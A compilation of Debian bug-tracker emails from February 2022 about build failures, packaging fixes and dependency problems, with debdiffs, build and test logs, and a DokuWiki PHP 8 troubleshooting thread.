Processing control commands: > close -1 5.5.3-1 Bug #1005143 [src:kamailio] src:kamailio: fails to migrate to testing for too long: FTBFS on armhf, mips*el and s390x Marked as fixed in versions kamailio/5.5.3-1. Bug #1005143 [src:kamailio] src:kamailio: fails to migrate to testing for too long: FTBFS on armhf, mips*el and s390x Marked Bug as done -- 1005143: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005143 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005141: linux-perf: Removes diversions on upgrade breaking it
Package: linux-perf Version: 5.16.3-1~exp1 Severity: serious Hi! This package has code in its postrm maintscript, which unconditionally removes the diversion, which breaks as the rename cannot be performed due to linux-base owning the file, and dpkg-divert refusing to overwrite it. This is the error shown: ,--- # dpkg -i linux-perf_5.16.7-1_amd64.deb (Reading database ... 280997 files and directories currently installed.) Preparing to unpack linux-perf_5.16.7-1_amd64.deb ... Leaving 'diversion of /usr/bin/perf to /usr/bin/perf.wrapper by linux-perf' Leaving 'diversion of /usr/share/bash-completion/completions/perf to /usr/share/bash-completion/completions/perf.wrapper by linux-perf' Leaving 'diversion of /usr/share/man/man1/perf.1.gz to /usr/share/man/man1/perf.wrapper.1.gz by linux-perf' Unpacking linux-perf (5.16.7-1) over (5.16.7-1) ... Removing 'diversion of /usr/bin/perf to /usr/bin/perf.wrapper by linux-perf' dpkg-divert: error: rename involves overwriting '/usr/bin/perf' with different file '/usr/bin/perf.wrapper', not allowed dpkg: warning: old linux-perf package post-removal script subprocess returned error exit status 2 dpkg: trying script from the new package instead ... Removing 'diversion of /usr/bin/perf to /usr/bin/perf.wrapper by linux-perf' dpkg-divert: error: rename involves overwriting '/usr/bin/perf' with different file '/usr/bin/perf.wrapper', not allowed dpkg: error processing archive linux-perf_5.16.7-1_amd64.deb (--install): new linux-perf package post-removal script subprocess returned error exit status 2 Leaving 'diversion of /usr/bin/perf to /usr/bin/perf.wrapper by linux-perf' Leaving 'diversion of /usr/share/bash-completion/completions/perf to /usr/share/bash-completion/completions/perf.wrapper by linux-perf' Leaving 'diversion of /usr/share/man/man1/perf.1.gz to /usr/share/man/man1/perf.wrapper.1.gz by linux-perf' Removing 'diversion of /usr/bin/perf to /usr/bin/perf.wrapper by linux-perf' dpkg-divert: error: rename involves overwriting '/usr/bin/perf' with different file '/usr/bin/perf.wrapper', not allowed dpkg: error while cleaning up: new linux-perf package post-removal script subprocess returned error exit status 2 Processing triggers for man-db (2.10.0-2) ... [main a8458e04] Commit dpkg db updates 1 file changed, 2 insertions(+), 1 deletion(-) Errors were encountered while processing: linux-perf_5.16.7-1_amd64.deb `--- The dpkg-divert calls should be protected to run only on the relevant actions on all maintscripts. Thanks, Guillem
Processed: diagnostics: diff for NMU version 0.3.3-12.2
Processing control commands: > tags 984031 + patch Bug #984031 [src:diagnostics] diagnostics: ftbfs with GCC-11 Added tag(s) patch. > tags 984031 + pending Bug #984031 [src:diagnostics] diagnostics: ftbfs with GCC-11 Added tag(s) pending. -- 984031: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=984031 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#984031: diagnostics: diff for NMU version 0.3.3-12.2
Control: tags 984031 + patch Control: tags 984031 + pending Dear maintainer, I've prepared an NMU for diagnostics (versioned as 0.3.3-12.2) and uploaded it to DELAYED/2. Please feel free to tell me if I should delay it longer. -- Regards Sudip diff -Nru diagnostics-0.3.3/debian/changelog diagnostics-0.3.3/debian/changelog --- diagnostics-0.3.3/debian/changelog 2021-02-16 10:43:01.0 + +++ diagnostics-0.3.3/debian/changelog 2022-02-07 18:37:08.0 + @@ -1,3 +1,10 @@ +diagnostics (0.3.3-12.2) unstable; urgency=medium + + * Non-maintainer upload. + * Fix FTBFS due to dynamic exception with gcc-11. (Closes: #984031) + + -- Sudip Mukherjee Mon, 07 Feb 2022 18:37:08 + + diagnostics (0.3.3-12.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru diagnostics-0.3.3/debian/patches/remove-dynamic-exception.patch diagnostics-0.3.3/debian/patches/remove-dynamic-exception.patch --- diagnostics-0.3.3/debian/patches/remove-dynamic-exception.patch 1970-01-01 01:00:00.0 +0100 +++ diagnostics-0.3.3/debian/patches/remove-dynamic-exception.patch 2022-02-07 18:36:35.0 + @@ -0,0 +1,26 @@ +Description: Remove dynamic exception to fix FTBFS with gcc-11 + +Author: Sudip Mukherjee +Bug-Debian: https://bugs.debian.org/984031 +Forwarded: no + +--- + +--- diagnostics-0.3.3.orig/diagnostics/extensions/memory/operators.hpp diagnostics-0.3.3/diagnostics/extensions/memory/operators.hpp +@@ -37,7 +37,6 @@ + #include + + void* operator new(::std::size_t const len) +-throw(::std::bad_alloc) + { + void* const result(malloc(len)); + ::diagnostics::memory::Allocation_Database::register_allocation(result,len); +@@ -59,7 +58,6 @@ void operator delete(void * const p) + } + + void* operator new[](::std::size_t const len) +-throw(::std::bad_alloc) + { + void* const result(malloc(len)); + ::diagnostics::memory::Allocation_Database::register_allocation(result,len); diff -Nru diagnostics-0.3.3/debian/patches/series diagnostics-0.3.3/debian/patches/series --- diagnostics-0.3.3/debian/patches/series 2021-02-16 10:32:11.0 + +++ diagnostics-0.3.3/debian/patches/series 2022-02-07 17:57:51.0 + @@ -5,3 +5,4 @@ gcc-6-destructor-is-noexcept test-run-cleanup no-ltdl-convenience.patch +remove-dynamic-exception.patch
Bug#1002194: marked as done (guacamole-server: FTBFS: rdp.c:440:5: error: ‘VerifyCertificate’ is deprecated [-Werror=deprecated-declarations])
Your message dated Mon, 07 Feb 2022 18:18:59 + with message-id and subject line Bug#1002194: fixed in guacamole-server 1.3.0-1.1 has caused the Debian Bug report #1002194, regarding guacamole-server: FTBFS: rdp.c:440:5: error: ‘VerifyCertificate’ is deprecated [-Werror=deprecated-declarations] to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002194: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002194 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: guacamole-server Version: 1.3.0-1 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20211220 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > /bin/bash ../../../libtool --tag=CC --mode=compile gcc -DHAVE_CONFIG_H -I. > -I../../.. -Wdate-time -D_FORTIFY_SOURCE=2 -Werror -Wall -Iinclude > -I../../../src/common -I../../../src/common-ssh -I../../../src/libguac > -I/usr/include/freerdp2/ -I/usr/include/winpr2 -g -O2 > -ffile-prefix-map=/<>=. -fstack-protector-strong -Wformat > -Werror=format-security -c -o libguac_client_rdp_la-rdp.lo `test -f 'rdp.c' > || echo './'`rdp.c > libtool: compile: gcc -DHAVE_CONFIG_H -I. -I../../.. -Wdate-time > -D_FORTIFY_SOURCE=2 -Werror -Wall -Iinclude -I../../../src/common > -I../../../src/common-ssh -I../../../src/libguac -I/usr/include/freerdp2/ > -I/usr/include/winpr2 -g -O2 -ffile-prefix-map=/<>=. > -fstack-protector-strong -Wformat -Werror=format-security -c rdp.c -fPIC > -DPIC -o .libs/libguac_client_rdp_la-rdp.o > rdp.c: In function ‘guac_rdp_handle_connection’: > rdp.c:440:5: error: ‘VerifyCertificate’ is deprecated > [-Werror=deprecated-declarations] > 440 | rdp_inst->VerifyCertificate = rdp_freerdp_verify_certificate; > | ^~~~ > In file included from /usr/include/freerdp2/freerdp/api.h:23, > from /usr/include/freerdp2/freerdp/freerdp.h:42, > from beep.h:23, > from rdp.c:21: > /usr/include/freerdp2/freerdp/freerdp.h:368:61: note: declared here > 368 | WINPR_DEPRECATED(ALIGN64 pVerifyCertificate > VerifyCertificate); /**< (offset 51) > | > ^ > /usr/include/winpr2/winpr/winpr.h:53:31: note: in definition of macro > ‘WINPR_DEPRECATED’ >53 | #define WINPR_DEPRECATED(obj) obj __attribute__((deprecated)) > | ^~~ > cc1: all warnings being treated as errors > make[5]: *** [Makefile:1335: libguac_client_rdp_la-rdp.lo] Error 1 The full build log is available from: http://qa-logs.debian.net/2021/12/20/guacamole-server_1.3.0-1_unstable.log A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! If you reassign this bug to another package, please marking it as 'affects'-ing this package. See https://www.debian.org/Bugs/server-control#affects If you fail to reproduce this, please provide a build log and diff it with mine so that we can identify if something relevant changed in the meantime. --- End Message --- --- Begin Message --- Source: guacamole-server Source-Version: 1.3.0-1.1 Done: Jeremy Bicha We believe that the bug you reported is fixed in the latest version of guacamole-server, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1002...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Jeremy Bicha (supplier of updated guacamole-server package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 07 Feb 2022 13:02:10 -0500 Source: guacamole-server Built-For-Profiles: noudeb Architecture: source Version: 1.3.0-1.1 Distribution: unstable Urgency: medium Maintainer: Debian Remote Maintainers Changed-By: Jeremy Bicha Closes: 1002194 Changes: guacamole-server (1.3.0-1.1) unstable; urgency=medium . * Non-maintainer upload * debian/rules: Don't fail the build for deprecated declarations (Closes: #1002194) Checksums-Sha1:
Processed: Bug #994672 forwarded upstream
Processing commands for cont...@bugs.debian.org: > forwarded 994672 https://github.com/open-iscsi/open-isns/commit/e7dac7 Bug #994672 [src:open-isns] open-isns FTBFS: error: ‘sigrelse’ is deprecated Set Bug forwarded-to-address to 'https://github.com/open-iscsi/open-isns/commit/e7dac7'. > -- Stopping processing here. Please contact me if you need assistance. -- 994672: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=994672 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Processed: [bts-link] source package src:python-envisage
Processing commands for cont...@bugs.debian.org: > # > # bts-link upstream status pull for source package src:python-envisage > # see http://lists.debian.org/debian-devel-announce/2006/05/msg1.html > # https://bts-link-team.pages.debian.net/bts-link/ > # > user debian-bts-l...@lists.debian.org Setting user to debian-bts-l...@lists.debian.org (was debian-bts-l...@lists.debian.org). > # remote status report for #1002325 (http://bugs.debian.org/1002325) > # Bug title: python-envisage: FTBFS: dh_auto_test: error: pybuild --test -i > python{version} -p "3.10 3.9" returned exit code 13 > # * https://github.com/enthought/envisage/issues/396 > # * remote status changed: (?) -> closed > # * closed upstream > tags 1002325 + fixed-upstream Bug #1002325 [src:python-envisage] python-envisage: FTBFS: dh_auto_test: error: pybuild --test -i python{version} -p "3.10 3.9" returned exit code 13 Added tag(s) fixed-upstream. > usertags 1002325 + status-closed There were no usertags set. Usertags are now: status-closed. > thanks Stopping processing here. Please contact me if you need assistance. -- 1002325: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002325 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005132: drf-yasg-nonfree: File conflicts between two different 1.20.1-1 versions
Source: drf-yasg-nonfree Version: 1.20.1-1 Severity: serious User: de...@kali.org Usertags: origin-kali drf-yasg-nonfree 1.20.1-1 was uploaded as source only on January 23th, the lack of binaries ended up in the package being removed by dak's auto-cruft. Then the maintainer rebuilt a new source package while keeping the 1.20.1-1 version and uploaded it again. deb.debian.org is a CDN and keeps in cache the package files for a very long time because they are supposed to be immutable so if you try to download drf-yasg-nonfree from deb.debian.org you get the first version of the package while the metadata refers to the second version and as such you get a checksum error (as I did in Kali, while trying to mirror bookworm): Wrong checksum during receive of 'http://deb.debian.org/debian/pool/non-free/d/drf-yasg-nonfree/drf-yasg-nonfree_1.20.1-1.dsc': md5 expected: 5c87ae878afc6adf6708439e2a0b4e97, got: 63c6925011f77e02306f451036181a13 sha256 expected: 2b3265636ef93b490b633cee9897c8462fb1cb42d1fb65226fb5a8601631ecd9, got: 834fa39b7b970704f936fc2a293ca47f9efc1939a62f5a33fcd0cea4e4a0767c size expected: 2467, got: 2434 This bug is just a request to upload 1.20.1-2 to get rid of this inconsistency that will last in deb.debian.org for as long as we don't upload a new version. The package has been temporarily removed from testing by Julien Cristau to make sure that mirroring bookworm out of deb.debian.org will work again shortly. -- System Information: Debian Release: bookworm/sid APT prefers stable-security APT policy: (500, 'stable-security'), (500, 'oldoldstable'), (500, 'unstable'), (500, 'stable'), (500, 'oldstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 5.15.0-3-amd64 (SMP w/16 CPU threads) Kernel taint flags: TAINT_WARN Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled
Processed: your mail
Processing commands for cont...@bugs.debian.org: > tags 997120 patch Bug #997120 [src:camitk] camitk: FTBFS: ld: cannot find CMakeFiles/application-config.dir/CommandLineOptions.ixx.o: No such file or directory Added tag(s) patch. > End of message, stopping processing here. Please contact me if you need assistance. -- 997120: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=997120 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#997120:
Hi. I've been looking into the camitk compilation, I think I have a patch for it. The build is currently failing by trying to find the file CommandLineOptions.ixx.o. Problem is really in the line above where the compiler does not identify the file CommandLineOptions.ixx as a valid c++ file, so the object file is not being generated: """ c++: warning: /build/camitk-o5Au93/camitk-4.1.2/sdk/applications/testactions/CommandLineOptions.ixx: linker input file unused because linking not done "" The compiler can be informed about the format of the file by using -x c++ but the result won't compile at all since the file seems to be designed to be used in combination with other headers (other headers include .ixx at the end of the file). The code is in the compilation units via include in other headers, no reason to add it to CMake. Removing the .ixx makes the compilation work in an Sid sbuild environment. """ +--+ | Summary | +--+ Autopkgtest: pass Build Architecture: amd64 Build Type: full Build-Space: 6204608 Build-Time: 725 Distribution: unstable Host Architecture: amd64 Install-Time: 72 Job: /home/jrivero/code/debian/camitk_4.1.2-5.dsc Lintian: warn Machine Architecture: amd64 Package: camitk Package-Time: 801 Piuparts: pass Source-Version: 4.1.2-5 Space: 6204608 Status: successful Version: 4.1.2-5 """ Attached is the debdiff. camitk_4.2.2-5.debdiff Description: Binary data
Processed: tagging 1005124
Processing commands for cont...@bugs.debian.org: > tags 1005124 + sid bookworm Bug #1005124 [src:ifeffit] ifeffit: rebuild for perl 5.34 transition Added tag(s) bookworm and sid. > thanks Stopping processing here. Please contact me if you need assistance. -- 1005124: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005124 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005125: libdbd-oracle-perl: rebuild for perl 5.34 transition
Source: libdbd-oracle-perl Version: 1.80-2 Severity: serious Tags: sid bookworm libdbd-oracle-perl needs to be rebuilt for the ongoing perl 5.34 transition. Since the package build depends on packages outside of main, a manual upload of builds for at least amd64 and i386 are required. Cheers -- Sebastian Ramacher
Bug#1005124: ifeffit: rebuild for perl 5.34 transition
Source: ifeffit Version: 2:1.2.11d-11 Severity: serious ifeffit needs to be rebuilt for the ongoing perl 5.34 transition. Since ifeffit build-depends on packages in non-free, somebody has to build and upload the binary packages for amd64. Cheers -- Sebastian Ramacher
Bug#1005121: linux-base: Many programs fron kernel not have memory allocation
Package: linux-base Version: 4.6 Severity: critical Justification: breaks the whole system On kernel many programs not kave included kcalloc ,kalloc because of that unexpected result occurr. Bellow is on on arch/x86/events/intel/*.c files missing memory allocations and program jump unallocated on stack.This is very bad. -- System Information: Debian Release: 10.11 APT prefers oldstable-updates APT policy: (500, 'oldstable-updates'), (500, 'oldstable-proposed-updates'), (500, 'oldoldstable'), (500, 'oldstable') Architecture: amd64 (x86_64) Kernel: Linux 5.7.8+ (SMP w/2 CPU cores) Kernel taint flags: TAINT_DIE, TAINT_WARN Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages linux-base depends on: ii debconf [debconf-2.0] 1.5.71+deb10u1 linux-base recommends no packages. linux-base suggests no packages. -- debconf information excluded
Bug#1005120: wpewebkit: Fails to build with gstreamer 1.20
Source: wpewebkit Version: 2.34.4-1 Severity: serious Tags: ftbfs wpewebkit fails to build from source, apparently because of the recent gstreamer 1.20 uploads. -- Checking for module 'gstreamer-codecparsers-1.0 >= 1.14.0' -- No package 'gstreamer-codecparsers-1.0' found That .pc file is provided by libgstreamer-plugins-bad1.0-dev so maybe you just need to Build-Depend on that. I get a similar warning when building webkit2gtk 2.34.4-1 but it doesn't fail the build like it does for wpewebkit Full build logs at https://launchpad.net/ubuntu/+source/wpewebkit/2.34.4-1build1 Thank you, Jeremy Bicha
Bug#1004330: makes the package useless with PHP 8
> >Hi Francesco, > >Francesco Potortì wrote: >> I had to revert some changes: >[…] >> The necessary change was >> >> -$conf['savedir'] = '/var/lib/dokuwiki/data'; //where to store all the >> files >> +$conf['savedir'] = './data'; //where to store all the files > >Do you remember why this was necessary, i.e. what didn't work without it? Dokuwiki cannot find the .data directory and says so in the web browser. I suppose that an alternative is creating a data link to /var/lib/dokuwiki/data. Maybe such link existed and I removed it in the past and an upgrade does not restore it? >> I know nothing about how php is managed on Debian. However, I had to add >> these links: >> >> /usr/share/dokuwiki/vendor/paragonie/random_compat/lib -> >> /usr/share/php/random_compat >> /usr/share/dokuwiki/vendor/phpseclib/phpseclib/phpseclib -> >> /usr/share/php/phpseclib > >Good catch! This indeed could be something that I oversaw. By the way, those files are in the php-phpseclib and php-random-compat packages. >> # /usr/share/dokuwiki/vendor/marcusschwarz/lesserphp/ >> >> I replaced all {0} with [0] > >That's one of the common changes I had to do. I though thought I had a >patch for that already in the package on Salsa: > >https://salsa.debian.org/abe/dokuwiki/-/blob/master/debian/patches/cherrypick_6b6d27d9.patch I had just downloaded your package, so apparently you missed that one... >Anyway, will look through all the things you found and will update the >package in git where it seems necessary. > >> Additionally, I get this in the Apache log: >> >> PHP Warning: Undefined array key "fperm" in >> /usr/share/dokuwiki/inc/Search/Indexer.php on line 1070, referer: >> http://wiki.potorti.it/egc2018/bilancio > >Yes. These are IIRC fixed upstream in git, but not in a release yet. I >might add them to avoid the warning, but for now I just want to do the >minimal thing to get it working again. > >> And unfortunately email sending still does not work: emails are sent >> with an empty From: field, so they fail at the sendmail level. > >Funnily for me it's opposite: I get more mails than before, and also >for changes I don't see via web interface. Still unclear why. I get one email per edit, as expected, but they bounce (and I see the bounce) because the To: header is empty. This has happened with php8. After I had patched all the places generating an error in the Apache log, I had this behaviour, which undortunately does not generate an error, so I could not catch it...
Bug#1004330: makes the package useless with PHP 8
Hi Francesco, Francesco Potortì wrote: > I had to revert some changes: […] > The necessary change was > > -$conf['savedir'] = '/var/lib/dokuwiki/data'; //where to store all the > files > +$conf['savedir'] = './data'; //where to store all the files Do you remember why this was necessary, i.e. what didn't work without it? > I know nothing about how php is managed on Debian. However, I had to add > these links: > > /usr/share/dokuwiki/vendor/paragonie/random_compat/lib -> > /usr/share/php/random_compat > /usr/share/dokuwiki/vendor/phpseclib/phpseclib/phpseclib -> > /usr/share/php/phpseclib Good catch! This indeed could be something that I oversaw. > # /usr/share/dokuwiki/vendor/marcusschwarz/lesserphp/ > > I replaced all {0} with [0] That's one of the common changes I had to do. I though thought I had a patch for that already in the package on Salsa: https://salsa.debian.org/abe/dokuwiki/-/blob/master/debian/patches/cherrypick_6b6d27d9.patch Anyway, will look through all the things you found and will update the package in git where it seems necessary. > Additionally, I get this in the Apache log: > > PHP Warning: Undefined array key "fperm" in > /usr/share/dokuwiki/inc/Search/Indexer.php on line 1070, referer: > http://wiki.potorti.it/egc2018/bilancio Yes. These are IIRC fixed upstream in git, but not in a release yet. I might add them to avoid the warning, but for now I just want to do the minimal thing to get it working again. > And unfortunately email sending still does not work: emails are sent > with an empty From: field, so they fail at the sendmail level. Funnily for me it's opposite: I get more mails than before, and also for changes I don't see via web interface. Still unclear why. Regards, Axel -- ,''`. | Axel Beckert , https://people.debian.org/~abe/ : :' : | Debian Developer, ftp.ch.debian.org Admin `. `' | 4096R: 2517 B724 C5F6 CA99 5329 6E61 2FF9 CD59 6126 16B5 `-| 1024D: F067 EA27 26B9 C3FC 1486 202E C09E 1D89 9593 0EDE
Processed: merging 1003664 1005113
Processing commands for cont...@bugs.debian.org: > merge 1003664 1005113 Bug #1003664 [fwupd] fwupd: Too loose dependency on libfwupdN Bug #1005113 [fwupd] fwupd: Please tighten the version of libfwupd2 Merged 1003664 1005113 > thanks Stopping processing here. Please contact me if you need assistance. -- 1003664: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1003664 1005113: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005113 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
Bug#1005053: marked as done (salt FTBFS on IPV6-only buildds)
Your message dated Mon, 07 Feb 2022 13:49:04 + with message-id and subject line Bug#1005053: fixed in salt 3004+dfsg1-8 has caused the Debian Bug report #1005053, regarding salt FTBFS on IPV6-only buildds to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1005053: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005053 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: salt Version: 3004+dfsg1-6 Severity: serious Tags: ftbfs https://buildd.debian.org/status/logs.php?pkg=salt=all ... === FAILURES === __ test_connected_ids __ def test_connected_ids(): """ test ckminion connected_ids when local_port_tcp returns 127.0.0.1 """ opts = {"publish_port": 4505, "detect_remote_minions": False} minion = "minion" ip = salt.utils.network.ip_addrs() mdata = {"grains": {"ipv4": ip, "ipv6": []}} ckminions = salt.utils.minions.CkMinions({"minion_data_cache": True}) patch_net = patch("salt.utils.network.local_port_tcp", return_value={"127.0.0.1"}) patch_list = patch("salt.cache.Cache.list", return_value=[minion]) patch_fetch = patch("salt.cache.Cache.fetch", return_value=mdata) with patch.dict(ckminions.opts, opts): with patch_net, patch_list, patch_fetch: ret = ckminions.connected_ids() > assert ret == {minion} E AssertionError: assert set() == {'minion'} E Extra items in the right set: E 'minion' E Use -v to get the full diff /<>/tests/pytests/unit/utils/test_minions.py:22: AssertionError __ test_connected_ids_remote_minions ___ def test_connected_ids_remote_minions(): """ test ckminion connected_ids when detect_remote_minions is set """ opts = { "publish_port": 4505, "detect_remote_minions": True, "remote_minions_port": 22, } minion = "minion" minion2 = "minion2" minion2_ip = "192.168.2.10" ip = salt.utils.network.ip_addrs() mdata = {"grains": {"ipv4": ip, "ipv6": []}} mdata2 = {"grains": {"ipv4": [minion2_ip], "ipv6": []}} ckminions = salt.utils.minions.CkMinions({"minion_data_cache": True}) patch_net = patch("salt.utils.network.local_port_tcp", return_value={"127.0.0.1"}) patch_remote_net = patch( "salt.utils.network.remote_port_tcp", return_value={minion2_ip} ) patch_list = patch("salt.cache.Cache.list", return_value=[minion, minion2]) patch_fetch = patch("salt.cache.Cache.fetch", side_effect=[mdata, mdata2]) with patch.dict(ckminions.opts, opts): with patch_net, patch_list, patch_fetch, patch_remote_net: ret = ckminions.connected_ids() > assert ret == {minion2, minion} E AssertionError: assert {'minion2'} == {'minion', 'minion2'} E Extra items in the right set: E 'minion' E Use -v to get the full diff /<>/tests/pytests/unit/utils/test_minions.py:51: AssertionError ... FAILED tests/pytests/unit/utils/test_minions.py::test_connected_ids - Asserti... FAILED tests/pytests/unit/utils/test_minions.py::test_connected_ids_remote_minions = 2 failed, 9692 passed, 1751 skipped, 5 xfailed, 4 xpassed, 552 warnings in 470.23s (0:07:50) = Exception ignored in: Traceback (most recent call last): File "/<>/salt/transport/ipc.py", line 702, in _read TypeError: catching classes that do not inherit from BaseException is not allowed Exception ignored in: Traceback (most recent call last): File "/<>/salt/transport/ipc.py", line 702, in _read TypeError: catching classes that do not inherit from BaseException is not allowed make[1]: *** [debian/rules:35: override_dh_auto_test] Error 1 --- End Message --- --- Begin Message --- Source: salt Source-Version: 3004+dfsg1-8 Done: Benjamin Drung We believe that the bug you reported is fixed in the latest version of salt, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1005...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution
Bug#1005113: fwupd: Please tighten the version of libfwupd2
Package: fwupd Version: 1.5.7-5 Severity: serious Hello, fwupd package should tighten the version of the libfwupd2 dependency (and probably libfwupdplugin as well) Mixing fwupd version 1.5.7-5 and libfwupd2 version 1.7.4-1 makes fwupd crash Kind regards, Laurent Bigonville -- System Information: Debian Release: bookworm/sid APT prefers unstable-debug APT policy: (500, 'unstable-debug'), (500, 'unstable'), (1, 'experimental-debug'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 5.15.0-3-amd64 (SMP w/8 CPU threads) Locale: LANG=fr_BE.UTF-8, LC_CTYPE=fr_BE.UTF-8 (charmap=UTF-8), LANGUAGE=fr_BE:fr Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: SELinux: enabled - Mode: Permissive - Policy name: refpolicy Versions of packages fwupd depends on: ii libc6 2.33-5 ii libcurl3-gnutls7.81.0-1 ii libefiboot137-6 ii libelf10.186-1 ii libflashrom1 1.2-5 ii libfwupd2 1.5.7-5 ii libfwupdplugin11.5.7-5 ii libglib2.0-0 2.70.3-1 ii libgnutls303.7.3-4+b1 ii libgudev-1.0-0 237-2 ii libgusb2 0.3.8-1 ii libjcat1 0.1.9-1 ii libjson-glib-1.0-0 1.6.6-1 ii libpolkit-gobject-1-0 0.105-31.1+b1 ii libsmbios-c2 2.4.3-1 ii libsqlite3-0 3.37.2-2 ii libsystemd0250.3-2 ii libtss2-esys-3.0.2-0 3.1.0-3 ii libxmlb2 0.3.6-2 ii shared-mime-info 2.1-2 Versions of packages fwupd recommends: ii bolt 0.9.1-2 ii dbus 1.12.20-3 ii fwupd-amd64-signed [fwupd-signed] 1.5.7+5 ii python33.9.8-1 pn secureboot-db ii udisks22.9.4-1 Versions of packages fwupd suggests: pn gir1.2-fwupd-2.0 -- Configuration Files: /etc/dbus-1/system.d/org.freedesktop.fwupd.conf [Errno 2] Aucun fichier ou dossier de ce type: '/etc/dbus-1/system.d/org.freedesktop.fwupd.conf' /etc/fwupd/remotes.d/fwupd.conf [Errno 2] Aucun fichier ou dossier de ce type: '/etc/fwupd/remotes.d/fwupd.conf' -- no debconf information
Bug#1004330: makes the package useless with PHP 8
I built and installed your package, thanks. These are the problems I encountered. # /etc/dokuwiki.php I had to revert some changes: diff -pu /etc/dokuwiki/dokuwiki.php /etc/dokuwiki/dokuwiki.php.dist --- /etc/dokuwiki/dokuwiki.php 2022-02-07 13:59:46.209521897 +0100 +++ /etc/dokuwiki/dokuwiki.php.dist 2022-01-25 04:12:00.0 +0100 @@ -13,14 +13,14 @@ /* Basic Settings */ -$conf['title'] = 'Debian DokuWiki'; //what to show in the title +$conf['title'] = 'DokuWiki';//what to show in the title $conf['start'] = 'start'; //name of start page $conf['lang']= 'en'; //your language $conf['template']= 'dokuwiki'; //see lib/tpl directory $conf['tagline'] = '';//tagline in header (if template supports it) $conf['sidebar'] = 'sidebar'; //name of sidebar in root namespace (if template supports it) $conf['license'] = 'cc-by-nc-sa'; //see conf/license.php -$conf['savedir'] = '/var/lib/dokuwiki/data'; //where to store all the files +$conf['savedir'] = './data'; //where to store all the files $conf['basedir'] = '';//absolute dir from serveroot - blank for autodetection $conf['baseurl'] = '';//URL to server including protocol - blank for autodetect $conf['cookiedir'] = '';//path to use in cookies - blank for basedir @@ -139,7 +139,7 @@ $conf['rss_show_summary'] = 1; $conf['rss_show_deleted'] = 1; //Show deleted items 0|1 /* Advanced Settings */ -$conf['updatecheck'] = 0;//automatically check for new releases? +$conf['updatecheck'] = 1;//automatically check for new releases? $conf['userewrite'] = 0;//this makes nice URLs: 0: off 1: .htaccess 2: internal $conf['useslash']= 0;//use slash instead of colon? only when rewrite is on $conf['sepchar'] = '_'; //word separator character in page names; may be a @@ -176,12 +176,3 @@ $conf['proxy']['user']= ''; $conf['proxy']['pass']= ''; $conf['proxy']['ssl'] = 0; $conf['proxy']['except'] = ''; -// Safemode Hack - read http://www.dokuwiki.org/config:safemodehack ! -$conf['safemodehack'] = 0; -$conf['ftp']['host'] = 'localhost'; -$conf['ftp']['port'] = '21'; -$conf['ftp']['user'] = 'user'; -$conf['ftp']['pass'] = 'password'; -$conf['ftp']['root'] = '/home/user/htdocs'; - - Note that I re-added the safemode hack even if I don't know what it is. The necessary change was -$conf['savedir'] = '/var/lib/dokuwiki/data'; //where to store all the files +$conf['savedir'] = './data'; //where to store all the files # php compatibility I know nothing about how php is managed on Debian. However, I had to add these links: /usr/share/dokuwiki/vendor/paragonie/random_compat/lib -> /usr/share/php/random_compat /usr/share/dokuwiki/vendor/phpseclib/phpseclib/phpseclib -> /usr/share/php/phpseclib # /usr/share/dokuwiki/vendor/marcusschwarz/lesserphp/ I replaced all {0} with [0] # Result Now it apparently works as it did after the patches I had done to the old package. Additionally, I get this in the Apache log: PHP Warning: Undefined array key "fperm" in 